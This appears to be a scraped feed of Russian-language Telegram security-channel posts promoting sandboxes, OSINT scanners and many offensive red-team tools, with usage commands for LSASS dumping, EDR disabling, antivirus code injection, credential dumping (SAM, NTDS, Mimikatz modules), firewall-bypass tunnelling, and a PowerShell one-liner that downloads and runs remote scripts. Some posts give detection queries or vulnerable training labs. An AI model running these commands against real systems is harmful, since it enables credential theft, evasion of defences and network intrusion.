Forwarded from ESCalator
Полезный пятничный пост 🫥
В ходе исследования угроз часто возникает потребность срочно изучить вредоносный файл/URL/домен. В этом посте мы собрали инструменты, которые у нас всегда под рукой для экспресс‑анализа.
Онлайн‑песочницы позволяют загрузить вредоносный файл в изолированную среду и наблюдать за его активностью:
Проверка доменов и вредоносных URL:
IoT‑поисковики сканируют IPv4‑пространство с разной частотой и собирают сетевую информацию о хостах. С помощью этих сервисов можно узнать, какие сервисы запущены или какие порты открыты на хостах без активного взаимодействия с ними:
Важно помнить, что, загружая файл на такие ресурсы (особенно в их бесплатных версиях), вы отправляете его в публичный доступ, где с ним могут взаимодействовать не только создатели сервиса, но и другие пользователи.
А какими инструментами для экспресс‑анализа пользуетесь вы? Делитесь в комментариях ✍🏼
#tip
@ptescalator
В ходе исследования угроз часто возникает потребность срочно изучить вредоносный файл/URL/домен. В этом посте мы собрали инструменты, которые у нас всегда под рукой для экспресс‑анализа.
Онлайн‑песочницы позволяют загрузить вредоносный файл в изолированную среду и наблюдать за его активностью:
https://any.run
https://www.virustotal.com
https://tria.ge
https://www.hybrid-analysis.com
https://analyze.intezer.com
https://capesandbox.com/analysis/
https://www.joesandbox.com
https://app.docguard.io/
Проверка доменов и вредоносных URL:
https://www.browserling.com/
https://urlscan.io/
https://urlhaus.abuse.ch/browse/
https://www.greynoise.io/
https://urlquery.net/
https://any.run
https://www.virustotal.com
IoT‑поисковики сканируют IPv4‑пространство с разной частотой и собирают сетевую информацию о хостах. С помощью этих сервисов можно узнать, какие сервисы запущены или какие порты открыты на хостах без активного взаимодействия с ними:
https://en.fofa.info/
https://search.censys.io/
https://www.zoomeye.ai/
https://www.shodan.io/
https://www.criminalip.io/
https://search.onyphe.io/
https://www.binaryedge.io/
Важно помнить, что, загружая файл на такие ресурсы (особенно в их бесплатных версиях), вы отправляете его в публичный доступ, где с ним могут взаимодействовать не только создатели сервиса, но и другие пользователи.
А какими инструментами для экспресс‑анализа пользуетесь вы? Делитесь в комментариях ✍🏼
#tip
@ptescalator
Please open Telegram to view this post
VIEW IN TELEGRAM
👍11🔥1
LDAP браузер написанный на
What started out as a GUI test and something to muck about with has sort of grown arms and legs. As it stands this is a cross platform GUI app for browsing LDAP and will direct YOLO into a Neo4J database, it comes with LDAP/LDAPS browsing capabilites, it'll run standalone and you can modify it how you like
#pyldapgui #ad
Please open Telegram to view this post
VIEW IN TELEGRAM
👍3🤔1
Forwarded from s0ld13r ch. (s0ld13r)
LSASS Dump over WMI 🤩
Давайте немного о OS Credential Dumping. Ресерчеры из SpecterOps показали инструмент для дампа кредов из памяти процесса LSASS через протокол WMI🕺
В чем фича кэп? Нет взаимодействия с классом Win32_Process который палит любой приличный EDR - стильно, модно, молодежно!
🛡 Detection
Создание .dmp файла в Temp директории Windows
Эксфильтрация дампа через SMB шару
💻 Repo: https://github.com/0xthirteen/WMI_Proc_Dump
📖 Research: https://specterops.io/blog/2025/09/18/more-fun-with-wmi/
🧢 s0ld13r
Давайте немного о OS Credential Dumping. Ресерчеры из SpecterOps показали инструмент для дампа кредов из памяти процесса LSASS через протокол WMI
В чем фича кэп? Нет взаимодействия с классом Win32_Process который палит любой приличный EDR - стильно, модно, молодежно!
event.code: 11 and file.path: *Windows\\Temp* and file.extension: dmp
Создание .dmp файла в Temp директории Windows
event.code: 5145 and winlog.event_data.ShareName: *.dmp
Эксфильтрация дампа через SMB шару
Please open Telegram to view this post
VIEW IN TELEGRAM
🤔4🔥3🤯1
🪛 retoolkit v2025.04
Это набор инструментов для реверс-инжиниринга и/или анализа ВПО в системах Windows x86 и x64.
Некоторые утилиты:
➡️ dex2jar
➡️ AutoIt-Ripper
➡️ HyperDbg
➡️ Cutter
➡️ Ghidra
➡️ de4dot
➡️ dnSpyEx
➡️ elfparser-ng
➡️ GoResym
➡️ HxD
➡️ JADX
➡️ pdf-parser
➡️ oletools
➡️ OfficeMalScanner
💻 Home
#soft #reverse #windows #retoolkit
✈️ Whitehat Lab 💬 Chat
Это набор инструментов для реверс-инжиниринга и/или анализа ВПО в системах Windows x86 и x64.
Некоторые утилиты:
#soft #reverse #windows #retoolkit
Please open Telegram to view this post
VIEW IN TELEGRAM
❤6
Узкоспециализированный инструмент написанный на
Установка:
sudo python3 -m pip install apachetomcatscanner
ApacheTomcatScanner -tt 172.16.0.10 -tp - —-list-cves
▪️ Проверка доступности
▪️ Многопоточность
▪️ Проверка стандартных УД
▪️ Определение версии
▪️ Список уязвимостей и CVE
▪️ Поддержка прокси
▪️ Экспорт в xlsx, json, sqlite
#tomcat #apache #apachetomcatscanner #soft #python
Please open Telegram to view this post
VIEW IN TELEGRAM
👍6❤3
Zerosalarium
EDR-Freeze: A Tool That Puts EDRs And Antivirus Into A Coma State
EDR-Freeze exploits the vulnerability of WerFaultSecure to suspend the processes of EDRs and Antimalware, halting the operation of Antivirus and EDR
Currently, in addition to merely focusing on avoiding scrutiny from EDRs (Endpoint Detection and Response) and Antivirus, the trend of using BYOVD (Bring Your Own Vulnerable Driver) techniques to disable the processes of EDRs and Antivirus by attackers is becoming increasingly popular.
The biggest drawback of the BYOVD technique is the need to find a way to install and execute drivers with vulnerabilities to exploit. Alternatively, a more straightforward approach is to exploit vulnerabilities in existing drivers on Windows
#edr #windows
Please open Telegram to view this post
VIEW IN TELEGRAM
Уязвимая среда для изучения безопасности Kubernetes
22 сценария:
▪️ Sensitive keys in codebases▪️ DIND (docker-in-docker) exploitation▪️ SSRF in the Kubernetes (K8S) world▪️ Container escape to the host system▪️ Docker CIS benchmarks analysis▪️ Kubernetes CIS benchmarks analysis▪️ Attacking private registry▪️ NodePort exposed services▪️ Helm v2 tiller to PwN the cluster - [Deprecated]▪️ Analyzing crypto miner container▪️ Kubernetes namespaces bypass▪️ Gaining environment information▪️ DoS the Memory/CPU resources▪️ Hacker container preview▪️ Hidden in layers▪️ RBAC least privileges misconfiguration▪️ KubeAudit - Audit Kubernetes clusters▪️ Falco - Runtime security monitoring & detection▪️ Popeye - A Kubernetes cluster sanitizer▪️ Secure network boundaries using NSP▪️ Cilium Tetragon - eBPF-based Security▪️ Observability and Runtime Enforcement▪️ Securing Kubernetes Clusters using Kyverno Policy Engine
Установка:
git clone https://github.com/madhuakula/kubernetes-goat.git
cd kubernetes-goat
chmod +x setup-kubernetes-goat.sh
bash setup-kubernetes-goat.sh
bash access-kubernetes-goat.sh
# navigate to http://127.0.0.1:1234
#k8s #goat #kubernetes
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥13
kubespec.dev
Kubernetes Spec v1.35: Reference Guide and Documentation
Find the documentation for all builtin resources, properties, types and even some examples!
Интерактивная шпаргалка по Kubernetes
Описание параметров
Примеры использования
Ссылки на полезные ресурсы
#k8s #kubernetes #devops
Please open Telegram to view this post
VIEW IN TELEGRAM
❤5
Из основных изменений:
➡️ Поддержка Nexmon➡️ Отказ от ARMel➡️ Обновлённый плагин (vpn ip) для Xfce
Добавили 10 инструментов:
➡️ Caido➡️ Caido-cli➡️ Detect It Easy (DiE)➡️ Gemini CLI➡️ krbrelayx➡️ ligolo-mp➡️ llm-tools-nmap➡️ mcp-kali-server➡️ patchleaks➡️ vwifi-dkms
Для перехода на новый релиз:
sudo apt update && sudo apt -y full-upgrade
Проверяем:
grep VERSION /etc/os-release
VERSION="2025.3"
VERSION_ID="2025.3"
VERSION_CODENAME="kali-rolling"
#kali #update
Please open Telegram to view this post
VIEW IN TELEGRAM
В netexec добавили полезный модуль - schtask_as (Remotely execute a scheduled task as a logged on user)
Usage:
💻 Commit
#nxc #windows
✈️ Whitehat Lab 💬 Chat
Если DA подключен к серверу, на котором вы являетесь локальным администратором, просто создайте запланированную задачу, запрашивающую сертификат от его имени, получите сертификат (pfx) и его личные данные. Все это автоматизировано в данном модуле
Usage:
nxc smb dc -d dom.local -u 'high_priv' -p 'high_priv123' -M schtask_as
#nxc #windows
Please open Telegram to view this post
VIEW IN TELEGRAM
1👍10
Инструмент для удаленного выполнения команд в
Возможность kerberos аутентификации, pth, pfx сертификату
scmr - Service Control Manager (MS-SCMR)
tsch - Task Scheduler (MS-TSCH)
dcom - Distributed Component Object Model (MS-DCOM)
wmi - Windows Management Instrumentation (MS-WMI)
UPD v0.2.2
#goexec #redteam #soft #golang
Please open Telegram to view this post
VIEW IN TELEGRAM
❤6
LSASS Process Dumper для современных версий Windows систем. На выходе получаем файл с замененными magic байтами, т.е. будет PNG, в любом hex редакторе возвращаем оригинальные 4 байта 0x4D, 0x44, 0x4D, 0x50
This is a tool that uses the old WerfaultSecure.exe program to dump the memory of processes protected by PPL (Protected Process Light), such as LSASS.EXE. The output is in Windows MINIDUMP format
#windows #lsass
Please open Telegram to view this post
VIEW IN TELEGRAM
❤6🤔4🔥1
Zerosalarium
IAmAntimalware: Inject Malicious Code Into Antivirus
IAmAntimalware employs new red team techniques by cloning services of Antivirus. Allow inject code into processes whitelisted, protected by Antivirus
#IAmAntimalware #av
Please open Telegram to view this post
VIEW IN TELEGRAM
👍5🔥2
Инструмент для различных манипуляций с токенами, байпасит KES, Defender, etc
#windows #token #impersonate
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥8
Вышло большое обновление отличного инструмента пост эксплуатации в
UPD. 0.9.0
Поддержка нескольких доменов
Улучшена работа через Proxifier / SSH туннели
Возможность включить/выключить RDP
Новые модули:
EventCreds
Дополнительные модули в LDAP:
GMSA
ConstrainedDelegation
UnconstrainedDelegation
AdminCount
ComputerSIDs
UserDescriptions
UserLogonRestrictions
UserPasswords
UserSIDs
Текущая поддержка методов (протоколов):
🔵 RDP🔵 SessionHunter🔵 SMB🔵 SMB Signing🔵 LDAP / LDAPS🔵 SSH🔵 Spraying🔵 VNC🔵 WinRM🔵 WMI🔵 MSSQL🔵 Kerberoast
Реализованные модули:
🔵 Amnesiac - выполнение Amnesiac C2 пейлоадов🔵 ConsoleHistory - история в PowerShell🔵 Files - файлы в типичных директориях🔵 KerbDump - дамп Kerberos билетов🔵 eKeys - дамп ключей (Mimikatz)🔵 LogonPasswords - дамп logon passwords (Mimikatz)🔵 LSA - дамп LSA (Mimikatz)🔵 NTDS - реализация DCsync🔵 SAM - дамп SAM
Запуск из памяти:
IEX(New-Object System.Net.WebClient).DownloadString("https://raw.githubusercontent.com/The-Viper-One/PME-Scripts/main/Invoke-NETMongoose.ps1");IEX(New-Object System.Net.WebClient).DownloadString("https://raw.githubusercontent.com/The-Viper-One/PsMapExec/main/PsMapExec.ps1")Примеры:
# Текущий пользователь
PsMapExec -Targets All -Method [Method]
# С паролем
PsMapExec -Targets All -Method [Method] -Username [Username] -Password [Password]
# С хешем
PsMapExec -Targets All -Method [Method] -Username [Username] -Hash [RC4/AES256]
# С билетом
PsMapExec -Targets All -Method [Method] -Ticket [doI.. OR Path to ticket file]
# Дамп SAM файла
PsMapExec -Targets DC.domain.local -Method SMB -Ticket [Base64-Ticket] -Module SAM
# Kerberoasting
PsMapExec -Method Kerberoast -ShowOutput
# Использование модулей
PsMapExec -Targets All -Method [Method] -Module [Module]
#soft #pentest #powershell #psmapexec #redteam #windows
Please open Telegram to view this post
VIEW IN TELEGRAM
❤6
wiz.io
Wiz Finds Critical Redis RCE Vulnerability: CVE‑2025‑49844 | Wiz Blog
A 13‑year Redis flaw (CVE‑2025‑49844) allows attackers to escape Lua sandbox and run code on hosts. See Wiz Research’s analysis and mitigations.
The vulnerability exploits a Use-After-Free (UAF) memory corruption bug that has existed for approximately 13 years in the Redis source code
CVSS Score: 10.0
Флоу уязвимости:
Коннект до Redis
Отправка вредоносного Lua скрипта через Eval
Триггерим Use-After-Free
Выход из Lua песочницы
Выполнение кода за пределами песочницы
Получаем полный доступ
Уязвимые версии до:
Redis 8.2.2
Redis 8.0.4
Redis 7.4.6
Redis 7.2.11
#cve #poc #redis
Please open Telegram to view this post
VIEW IN TELEGRAM
❤2
Remco van der Meer
Automating MS-RPC vulnerability research
Diving into the MS-RPC protocol and how to automate vulnerability research using a fuzzing approach.
Gain insights into MS-RPC implementations that may be vulnerable using an automated approach and make it easy to visualize the data
Использование:
Import-Module .\MS-RPC-Fuzzer.psm1
Get-RpcServerData -target "C:\Windows\System32\efssvc.dll" -OutPath .\output
#Fuzzing
'.\output\rpcServerData.json' | Invoke-RpcFuzzer -outpath .\output\ -minStrLen 100 -maxStrLen 1000 -minIntSize 9999 -maxIntSize 99999
#Analysis
'.\output\Allowed.json' | Import-DatatoNeo4j -Neo4jHost 192.168.178.89:7474 -Neo4jUsername neo4j
#rpc #windows
Please open Telegram to view this post
VIEW IN TELEGRAM
TCP туннель через файл
Bypassing a firewall:
# Host A
ft.exe -L 5000:127.0.0.1:3389 --write "\\server\share\1.dat" --read "\\server\share\2.dat"
# Host B
ft.exe --read "\\server\share\1.dat" --write "\\server\share\2.dat"
Tunnel TCP through RDP:
# Host A
ft.exe -L 5000:192.168.1.50:8888 --write "C:\Temp\1.dat" --read "C:\Temp\2.dat"
# Host B
ft.exe --read "\\tsclient\c\Temp\1.dat" --write "\\tsclient\c\Temp\2.dat"
#windows #filetunnel
Please open Telegram to view this post
VIEW IN TELEGRAM
🤯4🔥3